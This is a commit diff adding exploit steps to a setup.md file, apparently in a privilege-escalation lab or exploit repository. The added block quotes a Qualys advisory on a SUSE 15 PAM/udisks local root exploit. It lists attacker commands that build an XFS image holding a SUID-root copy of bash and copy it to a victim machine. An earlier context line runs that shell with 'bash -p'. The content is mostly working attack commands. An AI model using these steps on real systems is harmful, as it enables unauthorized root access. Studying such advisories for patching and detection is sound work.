Update setup.md

setup.md

@@ -26,3 +26,28 @@ mount
 
 /tmp/blockdev*/bash -p
 ```
+
+
+From: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
+
+```bash
+1/ On our own attacker machine, as root, we create an XFS image that
+contains a SUID-root shell, and copy it to the victim machine:
+
+------------------------------------------------------------------------
+attacker# dd if=/dev/zero of=./xfs.image bs=1M count=300
+
+attacker# mkfs.xfs ./xfs.image
+
+attacker# mkdir ./xfs.mount
+
+attacker# mount -t xfs ./xfs.image ./xfs.mount
+
+attacker# cp /bin/bash ./xfs.mount
+
+attacker# chmod 04555 ./xfs.mount/bash
+
+attacker# umount ./xfs.mount
+
+attacker# scp -i id_ed25519 ./xfs.image nobody@victim:
+```